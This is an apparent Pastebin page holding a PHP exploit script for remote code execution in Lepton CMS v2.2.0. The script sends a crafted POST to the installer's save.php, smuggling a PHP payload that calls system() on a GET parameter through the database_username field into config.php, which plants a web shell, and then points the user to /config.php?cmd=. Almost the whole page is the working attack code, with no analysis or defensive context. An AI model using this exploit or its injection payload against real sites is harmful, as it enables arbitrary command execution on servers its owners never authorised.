Advertisement
9r3nXPaRTa

Lepton CMS v2.2.0 - Remote Code Execution

Sep 7th, 2016
365
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.22 KB | None | 0 0
  1. <?php
  2.  
  3. /*
  4. Lepton CMS v2.2.0 - Remote Code Execution.
  5. Author: Hyp3rLinx
  6. Exploit Author: ~
  7. */
  8.  
  9. $target = "http://127.0.0.1/lepton/install/save.php";
  10. $payload = "');?><?php echo '<pre>'; system(\$_GET['cmd']); die();?>";
  11.  
  12. function curl_post($url, $post_data) {
  13. $ch = curl_init();
  14. curl_setopt($ch, CURLOPT_URL, $url);
  15. curl_setopt($ch, CURLOPT_POST, 15);
  16. curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
  17. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  18. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
  19. $output = curl_exec($ch);
  20. $info = curl_getinfo($ch);
  21. curl_close($ch);
  22. return $info;
  23. }
  24.  
  25. $da = curl_post($target, "guid=E610A7F2-5E4A-4571-9391-C947152FDFB0&website_title=abc&lepton_url=a&default_timezone_string=Europe/London&default_language=EN&operating_system=linux&database_host=127.0.0.1&database_username=$payload&database_password=abc&database_name=test&table_prefix=abc_&admin_username=admin&admin_email=admin@admin.com&admin_password=admin&admin_repassword=admin");
  26. if($da['http_code'] == 200) {
  27. echo "\nTada: Now visit /config.php?cmd= on target.\n";
  28. }
  29.  
  30. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement